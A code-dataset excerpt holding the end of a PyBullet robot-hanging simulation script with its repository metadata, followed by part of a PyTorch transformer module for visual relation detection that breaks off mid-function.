in hook_dict.keys() and 'trajectory' in hook_dict.keys(), \\\n f'\"hook_pose\" or \"file\" or \"trajectory\" not in hook_dict!, please run keypoint_trajectory.py'\n \n # ------------------------ #\n # --- Setup simulation --- #\n # ------------------------ #\n\n # Create pybullet GUI\n physics_client_id = p.connect(p.DIRECT)\n # physics_client_id = p.connect(p.GUI)\n # p.configureDebugVisualizer(p.COV_ENABLE_GUI,0)\n p.resetDebugVisualizerCamera(\n cameraDistance=0.2,\n cameraYaw=90,\n cameraPitch=-30,\n cameraTargetPosition=[0.5, 0.0, 1.3]\n )\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150)\n sim_timestep = 1.0 / 240\n p.setTimeStep(sim_timestep)\n p.setGravity(0, 0, -9.8)\n\n # ------------------- #\n # --- Setup robot --- #\n # ------------------- #\n\n # Load plane contained in pybullet_data\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"plane.urdf\"))\n robot = pandaEnv(physics_client_id, use_IK=1)\n\n # -------------------------- #\n # --- Load other objects --- #\n # -------------------------- #\n\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"table/table.urdf\"), [1, 0.0, 0.0])\n\n obj_contact_pose_6d = obj_dict['contact_pose']\n obj_contact_relative_transform = get_matrix_from_pos_rot(obj_contact_pose_6d[:3], obj_contact_pose_6d[3:])\n obj_id = p.loadURDF(obj_dict['file'])\n # p.resetBasePositionAndOrientation(obj_id, obj_pos, obj_rot)\n\n hook_pose_6d = hook_dict['hook_pose']\n hook_pos = hook_pose_6d[:3]\n hook_quat = hook_pose_6d[3:]\n hook_id = p.loadURDF(hook_dict['file'], hook_pos, hook_quat)\n hook_transform = get_matrix_from_pos_rot(hook_pos, hook_quat)\n\n wpt_num = args.wpt_num\n wpt_dim = args.wpt_dim\n preload_path = f'kptraj_{wpt_num}/val/{hook_name}/traj-{args.traj_id}.json'\n assert os.path.exists(preload_path), f'{preload_path} not exists'\n preload_traj_dict = json.load(open(preload_path, 'r')) \n trajectories_hook = [preload_traj_dict['trajectory'][::-1]]\n # trajectories_hook = hook_dict['trajectory'][2:3]\n\n # grasping\n index = 0 # medium\n initial_info = obj_hook_pair_dict['initial_pose'][index] # medium\n obj_pos = initial_info['obj_pose'][:3]\n obj_rot = initial_info['obj_pose'][3:]\n # obj_pos = list(np.array(obj_pos) + np.array([0, 0, 0.02]))\n\n initial_info = obj_hook_pair_dict['initial_pose'][index] # medium\n robot_pos = initial_info['robot_pose'][:3]\n robot_rot = initial_info['robot_pose'][3:]\n # robot_pos = list(np.array(robot_pos) + np.array([0, 0, 0.02]))\n robot_pose = robot_pos + robot_rot\n robot_transform = get_matrix_from_pos_rot(robot_pos, robot_rot)\n\n for traj_i in range(len(trajectories_hook)):\n \n robot.reset()\n\n robot.apply_action(robot_pose, max_vel=-1)\n for _ in range(int(1.0 / sim_timestep * 0.5)): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n robot.grasp(obj_id=obj_id)\n for _ in range(int(1.0 / sim_timestep * 0.25)): \n p.resetBasePositionAndOrientation(obj_id, obj_pos, obj_rot)\n p.stepSimulation()\n time.sleep(sim_timestep)\n time.sleep(1)\n\n obj_transform = get_matrix_from_pos_rot(obj_pos, obj_rot)\n kpt_transform_world = obj_transform @ obj_contact_relative_transform\n \n trajectory_hook = trajectories_hook[traj_i]\n\n if wpt_dim == 3:\n trajectory_hook_3d = np.asarray(trajectory_hook)[:, :3]\n trajectory_hook_world = recover_trajectory(trajectory_hook_3d, hook_pose_6d, np.array([0, 0, 0]), 1)\n\n trajectory_hook = []\n for wpt_world in trajectory_hook_world:\n wpt_trans = np.linalg.inv(get_matrix_from_pose(hook_pose_6d)) @ get_matrix_from_pose(wpt_world)\n 
trajectory_hook.append(list(get_pose_from_matrix(wpt_trans)))\n\n # first_waypoint = trajectory_hook[-100:][0]\n first_waypoint = trajectory_hook[0]\n relative_kpt_transform = get_matrix_from_pos_rot(first_waypoint[:3], first_waypoint[3:])\n first_kpt_transform_world = hook_transform @ relative_kpt_transform\n\n kpt_transform_world = refine_rotation(first_kpt_transform_world, kpt_transform_world)\n\n kpt_to_gripper = np.linalg.inv(kpt_transform_world) @ robot_transform\n first_gripper_transform = first_kpt_transform_world @ kpt_to_gripper\n\n first_gripper_pos, first_gripper_rot = get_pos_rot_from_matrix(first_gripper_transform)\n first_gripper_pose = list(first_gripper_pos) + list(first_gripper_rot)\n\n # draw_coordinate(first_kpt_transform_world, size=0.01)\n\n trajectory_start = get_dense_waypoints(robot_pose, first_gripper_pose, resolution=0.002)\n for waypoint in trajectory_start:\n robot.apply_action(waypoint)\n p.stepSimulation()\n robot.grasp()\n for _ in range(10): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n \n old_gripper_pose = first_gripper_pose\n # trajectory_hook = trajectory_hook[-100:-20] if 'hard' in hook_name or 'devil' in hook_name else trajectory_hook[-100:-5]\n \n ignore_wpt_num = int(np.ceil(len(trajectory_hook[0]) * 0.1)) if wpt_dim == 3 else 0\n for i, waypoint in enumerate(trajectory_hook):\n\n if i + ignore_wpt_num >= len(trajectory_hook):\n break\n\n waypoint_abs = get_pose_from_matrix(hook_transform @ get_matrix_from_pose(waypoint))\n\n gripper_transform = get_matrix_from_pose(waypoint_abs) @ kpt_to_gripper\n gripper_pose = get_pose_from_matrix(gripper_transform)\n\n fine_gripper_poses = get_dense_waypoints(old_gripper_pose, gripper_pose, resolution=0.002)\n for fine_gripper_pose in fine_gripper_poses:\n robot.apply_action(fine_gripper_pose)\n p.stepSimulation()\n \n robot.grasp()\n for _ in range(5): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n old_gripper_pose = gripper_pose\n\n # execution step 2 : release gripper\n robot_apply_action(robot, obj_id, gripper_pose, gripper_action='pre_grasp', \n sim_timestep=0.05, diff_thresh=0.01, max_vel=-1, max_iter=100)\n\n # execution step 3 : go to the ending pose\n gripper_rot = p.getLinkState(robot.robot_id, robot.end_eff_idx, physicsClientId=robot._physics_client_id)[5]\n gripper_rot_matrix = R.from_quat(gripper_rot).as_matrix()\n ending_gripper_pos = np.asarray(gripper_pose[:3]) + (gripper_rot_matrix @ np.array([[0], [0], [-0.05]])).reshape(3)\n action = tuple(ending_gripper_pos) + tuple(gripper_rot)\n robot_apply_action(robot, obj_id, action, gripper_action='nop', \n sim_timestep=0.05, diff_thresh=0.005, max_vel=-1, max_iter=100)\n\n # p.removeAllUserDebugItems()\n\n # for _ in range(int(0.2/sim_timestep)): \n # p.stepSimulation()\n # time.sleep(sim_timestep)\n\n contact = False\n contact_points = p.getContactPoints(obj_id, hook_id)\n contact = True if contact_points != () else False\n\n fname_out = f'hanging_by_trajectory_result_{args.traj_id}_{wpt_num}w_{wpt_dim}d.txt'\n f_out = open(fname_out, 'a')\n f_out.write(f'{hook_name},{obj_name},{traj_i},{1 if contact else 0}\\n')\n f_out.close()\n\n# start_msg = \\\n# '''\n# ======================================================================================\n# this script will execute the hanging process using the collected keypoint trajectories\n# in \n# - [input_root]/[input_dir]/[hook_name].json \n# - [input_root]/[input_dir]/[object_name].json\n\n# dependency :\n# - object folder that contains /[object_name]/base.urdf\n# - hook folder 
that contains /[hook_name]/base.urdf\n#     - the keypoint pose of objects in [input_root]/[input_dir]/[obj_name].json\n#     - the keypoint trajectories of hooks in [input_root]/[input_dir]/[hook_name].json\n#     - the folder that contains the initial poses of objects in \n#       [data_root]/[data_dir]/[hook_name-object_set]/[hook_name-object_name].json\n# note :\n#     - you can run this script using ./run.sh hangtraj\n# ======================================================================================\n# '''\n\n# print(start_msg)\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--data-root', '-dr', type=str, default='data')\n    parser.add_argument('--data-dir', '-dd', type=str, default='everyday_objects_50')\n    parser.add_argument('--input-root', '-ir', type=str, default='keypoint_trajectory')\n    parser.add_argument('--input-dir', '-id', type=str, default='everyday_objects_50')\n    parser.add_argument('--obj', '-obj', type=str, default='hanging_exp_daily_5.json')\n    parser.add_argument('--hook', '-hook', type=str, default='Hook_my_bar_easy.json')\n    parser.add_argument('--traj_id', '-ti', type=int, default=0)\n    parser.add_argument('--wpt_num', '-wn', type=int, default=10)\n    parser.add_argument('--wpt_dim', '-wd', type=int, default=3)\n    parser.add_argument('--output-root', '-or', type=str, default='demonstration_data')\n    parser.add_argument('--output-dir', '-od', type=str, default='')\n    parser.add_argument('--save-demo', '-sd', action=\"store_true\")\n    parser.add_argument('--save-gif', '-sg', action=\"store_true\")\n    args = parser.parse_args()\n    main(args)", "repo_name": "Chialiang86/Hanging-Motion-Planning", "sub_path": "hanging_by_trajectory.py", "file_name": "hanging_by_trajectory.py", "file_ext": "py", "file_size_in_byte": 17312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "inspect.getfile", "line_number": 18, "usage_type": "call"}, {"api_name": "inspect.currentframe", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.sys.path.insert", "line_number": 20, "usage_type": "call"}, {"api_name": "os.sys", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.linalg", 
"line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 70, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_rotvec", "line_number": 75, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 75, "usage_type": "name"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 77, "usage_type": "call"}, {"api_name": "pybullet_robot_envs.envs.panda_envs.panda_env.pandaEnv", "line_number": 82, "usage_type": "name"}, {"api_name": "pybullet.stepSimulation", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 97, "usage_type": "call"}, {"api_name": "pybullet.getLinkState", "line_number": 99, "usage_type": "call"}, {"api_name": "pybullet.getLinkState", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 101, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 107, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.divide", "line_number": 121, "usage_type": "call"}, {"api_name": "quaternion.as_quat_array", "line_number": 122, "usage_type": "call"}, {"api_name": "utils.bullet_utils.xyzw2wxyz", "line_number": 122, "usage_type": "call"}, {"api_name": "quaternion.as_quat_array", "line_number": 123, "usage_type": "call"}, {"api_name": "utils.bullet_utils.xyzw2wxyz", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 129, "usage_type": "call"}, {"api_name": "quaternion.slerp_evaluate", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.bullet_utils.wxyz2xyzw", "line_number": 131, "usage_type": "call"}, {"api_name": "quaternion.as_float_array", "line_number": 131, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_matrix", "line_number": 141, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 141, "usage_type": "name"}, {"api_name": "numpy.linalg.inv", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 141, "usage_type": "attribute"}, {"api_name": "numpy.identity", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_rotvec", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.pi", "line_number": 144, "usage_type": "attribute"}, {"api_name": "scipy.spatial.transform.Rotation.from_matrix", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 
146, "usage_type": "name"}, {"api_name": "numpy.linalg.inv", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 148, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 174, "usage_type": "call"}, {"api_name": "json.load", "line_number": 176, "usage_type": "call"}, {"api_name": "json.load", "line_number": 178, "usage_type": "call"}, {"api_name": "pybullet.connect", "line_number": 197, "usage_type": "call"}, {"api_name": "pybullet.DIRECT", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pybullet.resetDebugVisualizerCamera", "line_number": 200, "usage_type": "call"}, {"api_name": "pybullet.resetSimulation", "line_number": 206, "usage_type": "call"}, {"api_name": "pybullet.setPhysicsEngineParameter", "line_number": 207, "usage_type": "call"}, {"api_name": "pybullet.setTimeStep", "line_number": 209, "usage_type": "call"}, {"api_name": "pybullet.setGravity", "line_number": 210, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pybullet_data.getDataPath", "line_number": 217, "usage_type": "call"}, {"api_name": "pybullet_robot_envs.envs.panda_envs.panda_env.pandaEnv", "line_number": 218, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pybullet_data.getDataPath", "line_number": 224, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 227, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 228, "usage_type": "call"}, {"api_name": "pybullet.loadURDF", "line_number": 234, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "json.load", 
"line_number": 241, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 257, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 265, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 266, "usage_type": "call"}, {"api_name": "pybullet.resetBasePositionAndOrientation", "line_number": 269, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 270, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 271, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 285, "usage_type": "attribute"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 285, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 286, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pos_rot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 295, "usage_type": "attribute"}, {"api_name": "utils.bullet_utils.get_pos_rot_from_matrix", "line_number": 298, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 306, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 309, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 315, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 321, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 321, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_matrix_from_pose", "line_number": 323, "usage_type": "call"}, {"api_name": "utils.bullet_utils.get_pose_from_matrix", "line_number": 324, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 329, "usage_type": "call"}, {"api_name": "pybullet.stepSimulation", "line_number": 333, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 334, "usage_type": "call"}, {"api_name": "pybullet.getLinkState", "line_number": 342, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 343, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 344, "usage_type": "call"}, {"api_name": "pybullet.getContactPoints", "line_number": 356, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 387, "usage_type": "call"}]}
+{"seq_id": "4687325756", "text": "# modified by Sherif Abdelkarim on Jan 2020\n\nimport numpy as np\nfrom numpy import linalg as la\nimport math\nimport logging\nimport json\n\nimport torch\nfrom torch import nn\nfrom torch.nn import init\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport nn as mynn\n\nfrom core.config import cfg\nimport utils.net as net_utils\nfrom modeling.sparse_targets_rel import FrequencyBias\nfrom utils import focal_loss\nfrom .transformer import LayerNorm, Conv1D_, gelu\nimport copy\nfrom .image_encoder import MemoryAugmentedEncoder\nfrom .attention import ScaledDotProductAttentionMemory\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass Attention(nn.Module):\n def __init__(self, n_state=768, n_head=12, n_emb=768):\n super(Attention, self).__init__()\n self.n_head = n_head\n self.n_emb = n_emb\n self.c_attn = Conv1D_(n_state * 3, n_state)\n self.c_proj = Conv1D_(n_state, n_state)\n self.split_size = n_state\n \n self.m = 100\n\n self.memory_features = nn.Parameter(torch.FloatTensor(1, self.m, n_state))\n self.mem_attn = Conv1D_(n_state * 2, n_state)\n self.alpha = nn.Linear( n_state + n_state , n_state)\n\n\n self.attn_pdrop = nn.Dropout(0.1)\n\n def _attn(self, q, k, v):\n w = torch.matmul(q, k)\n\n w = nn.Softmax(dim=-1)(w)\n self.w = self.attn_pdrop(w)\n\n return w, torch.matmul(w, v)\n\n def merge_heads(self, x):\n x = x.permute(0, 2, 1, 3).contiguous()\n new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)\n return x.view(*new_x_shape)\n\n def split_heads(self, x, k=False):\n new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)\n x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states\n if k:\n return x.permute(0, 2, 3, 1) # (batch, head, head_features, seq_length)\n else:\n return x.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)\n\n def forward(self, x):\n\n x1 = self.c_attn(x)\n query, key, value = x1.split(self.split_size, dim=2)\n\n b_s , nq = query.shape[:2]\n\n\n query = self.split_heads(query)\n key = self.split_heads(key, k=True)\n value = self.split_heads(value)\n\n\n _,a = self._attn(query, key, value)\n a = self.merge_heads(a)\n\n memory = self.memory_features.expand(b_s, self.m, self.split_size)\n\n memory = self.mem_attn(memory)\n memory_key , memory_value = memory.split(self.split_size,dim=2)\n\n\n m_update_key = self.split_heads(memory_key, k=True)\n m_update_value = self.split_heads(memory_value)\n\n\n _, a1 = self._attn(query, m_update_key, m_update_value)\n a1 = self.merge_heads(a1)\n\n alpha = torch.sigmoid(self.alpha(torch.cat([a, a1],-1)))\n\n\n a = alpha * a + (1-alpha)*a1\n \n\n a = self.c_proj(a)\n return a\n\nclass Enc_Dec_Attention(nn.Module):\n def __init__(self, n_state=768, n_head =12, n_emb = 768):\n super(Enc_Dec_Attention,self).__init__()\n self.n_head = n_head\n self.n_emb = n_emb\n self.c_attn = Conv1D_(n_state * 3, n_state)\n self.c_proj = Conv1D_(n_state , n_state)\n\n self.fc_q = nn.Linear(n_state, n_emb)\n self.fc_k = nn.Linear(n_state, n_emb)\n self.fc_v = nn.Linear(n_state, n_emb)\n\n self.attn_dropout = nn.Dropout(0.2)\n self.init_weights()\n \n def init_weights(self):\n\n nn.init.xavier_uniform_(self.fc_q.weight)\n nn.init.xavier_uniform_(self.fc_k.weight)\n nn.init.xavier_uniform_(self.fc_v.weight)\n\n nn.init.constant_(self.fc_q.bias, 0)\n nn.init.constant_(self.fc_k.bias, 0)\n nn.init.constant_(self.fc_v.bias, 0)\n\n\n \n def _attn(self, q, k, v , enc_dec_attention):\n\n nk = k.shape[-1]\n w = torch.matmul(q,k)\n\n w = w / 
math.sqrt(v.size(-1))\n\n        if enc_dec_attention is not None:\n            # mask out encoder positions that must not be attended to\n            w = w.masked_fill(enc_dec_attention, -10000.0)\n\n        w = nn.Softmax(dim=-1)(w)\n        w = self.attn_dropout(w)\n        return torch.matmul(w, v)\n\n    def merge_heads(self, x):\n        x = x.permute(0, 2, 1, 3).contiguous()\n        new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)\n        return x.view(*new_x_shape) # in Tensorflow implem: fct merge_states\n\n    def split_heads(self, x, k=False):\n        new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)\n        x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states\n        if k:\n            return x.permute(0, 2, 3, 1) # (batch, head, head_features, seq_length)\n        else:\n            return x.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)\n\n    def forward(self, x, encoder_output=None, mask_encoder=None):\n\n        query = self.fc_q(x)\n        encoder_key = self.fc_k(encoder_output)\n        encoder_value = self.fc_v(encoder_output)\n        query = self.split_heads(query)\n        encoder_key = self.split_heads(encoder_key, k=True)\n        encoder_value = self.split_heads(encoder_value)\n\n        a = self._attn(query, encoder_key, encoder_value, mask_encoder)\n        a = self.merge_heads(a)\n        a = self.c_proj(a)\n\n        return a\n\n\nclass MLP(nn.Module):\n    def __init__(self, n_state, n_emb): # in MLP: n_state=3072 (4 * n_embd)\n        super(MLP, self).__init__()\n        nx = n_emb\n        self.c_fc = Conv1D_(n_state, nx)\n        self.c_proj = Conv1D_(nx, n_state)\n        self.act = gelu\n\n    def forward(self, x):\n        h = self.act(self.c_fc(x))\n        h2 = self.c_proj(h)\n        return h2\n\n\nclass Block(nn.Module):\n    def __init__(self, n_state, n_head, n_emb):\n        super(Block, self).__init__()\n        self.n_state = n_state\n        self.n_head = n_head\n        self.n_emb = n_emb\n\n        self.ln_1 = LayerNorm(n_emb, eps=1e-5)\n        self.attn = Attention(n_state, n_head, n_emb)\n        self.ln_2 = LayerNorm(n_emb, eps=1e-5)\n        self.mlp = MLP(4 * n_state, n_emb)\n        self.resid_pdrop = nn.Dropout(0.1)\n\n        self.enc_dec_attn = Enc_Dec_Attention(n_state, n_head, n_emb)\n        self.fc_alpha1 = nn.Linear(n_state + n_state, n_state)\n        self.fc_alpha2 = nn.Linear(n_state + n_state, n_state)\n\n    def forward(self, x, encoder_features, mask_encoder):\n\n        # x: (batch, seq_len, n_emb), e.g. torch.Size([25, 17, 768])\n        # encoder_features: (batch, levels, regions, n_emb), e.g. torch.Size([25, 3, 50, 768])\n        # mask_encoder: (batch, 1, 1, regions), e.g. torch.Size([25, 1, 1, 50])\n\n        self_attention = self.attn(self.ln_1(x))\n        a = x + self_attention\n\n        a = self.resid_pdrop(a)\n\n        enc_att1 = self.enc_dec_attn(x=self.ln_1(a), encoder_output=self.ln_1(encoder_features[:, 0]), mask_encoder=mask_encoder)\n        enc_att2 = self.enc_dec_attn(x=self.ln_1(a), encoder_output=self.ln_1(encoder_features[:, 1]), mask_encoder=mask_encoder)\n\n        alpha1 = torch.sigmoid(self.fc_alpha1(torch.cat([a, enc_att1], -1)))\n        alpha2 = torch.sigmoid(self.fc_alpha2(torch.cat([a, enc_att2], -1)))\n\n        enc_att1 = alpha1 * a + (1 - alpha1) * enc_att1\n        enc_att2 = alpha2 * a + (1 - alpha2) * enc_att2\n\n        # average the two gated encoder-level attentions\n        a = (enc_att1 + enc_att2) / np.sqrt(2)\n\n        m = self.mlp(self.ln_2(a))\n\n        output = a + m\n        output = self.resid_pdrop(output)\n\n        return output\n\n\nclass MultiHeadModel(nn.Module):\n    def __init__(self, n_layer, n_state, n_head, n_embd):\n        super(MultiHeadModel, self).__init__()\n        self.n_layer = n_layer\n        self.n_state = n_state\n        self.n_head = n_head\n        self.n_embd = n_embd\n\n        self.language_fc = nn.Linear(300, n_embd)\n        self.visual_fc = nn.Linear(1024, n_embd)\n\n        self.wpe = nn.Embedding(5, n_embd)\n        self.wte = nn.Embedding(5, n_embd)\n        block = 
Block(n_state, n_head, n_embd)\n        self.h = nn.ModuleList([copy.deepcopy(block) for _ in range(n_layer)])\n\n        self.dropout = nn.Dropout(0.1)\n\n        self.linear_projection = nn.Linear(n_embd, 1024)\n        self.layer_norm = nn.LayerNorm(1024, eps=1e-5)\n\n    def data_transformation(self, sub_label, obj_label, sub_visual, obj_visual, label_visual):\n        sub_label = self.language_fc(sub_label)\n        sub_label = sub_label.reshape(-1, 1, self.n_embd)\n        obj_label = self.language_fc(obj_label)\n        obj_label = obj_label.reshape(-1, 1, self.n_embd)\n\n        sub_visual = self.visual_fc(sub_visual)\n        sub_visual = sub_visual.reshape(-1, 1, self.n_embd)\n        obj_visual = self.visual_fc(obj_visual)\n        obj_visual = obj_visual.reshape(-1, 1, self.n_embd)\n        label_visual = self.visual_fc(label_visual)\n        label_visual = label_visual.reshape(-1, 1, self.n_embd)\n        try:\n            input_ids = torch.cat([sub_label, obj_label, sub_visual, obj_visual, label_visual], -2)\n        except Exception:\n            print(sub_label.shape)\n            print(obj_label.shape)\n            print(sub_visual.shape)\n            print(obj_visual.shape)\n            print(label_visual.shape)\n            raise # re-raise after dumping the shapes for debugging\n\n        position_ids = torch.arange(5, dtype=torch.long, device=sub_label.device)\n        position_ids = position_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n\n        position_ids = self.wpe(position_ids)\n\n        type_ids = torch.tensor([0, 0, 1, 1, 1], dtype=torch.long, device=sub_label.device)\n        type_ids = type_ids.unsqueeze(0).expand_as(input_ids[:, :, 0])\n        type_ids = self.wte(type_ids)\n\n        input_ids = input_ids + position_ids + type_ids\n        return input_ids\n\n    def data_transformation_only_visual(self, sub_visual, obj_visual, label_visual):\n        sub_visual = self.visual_fc(sub_visual)\n        sub_visual = sub_visual.reshape(-1, 1, self.n_embd)\n        obj_visual = self.visual_fc(obj_visual)\n        obj_visual = obj_visual.reshape(-1, 1, self.n_embd)\n        label_visual = self.visual_fc(label_visual)\n        label_visual = label_visual.reshape(-1, 1, self.n_embd)\n        try:\n            input_ids = torch.cat([sub_visual, obj_visual, label_visual], -2)\n        except Exception:\n            print(sub_visual.shape)\n            print(obj_visual.shape)\n            print(label_visual.shape)\n            raise # re-raise after 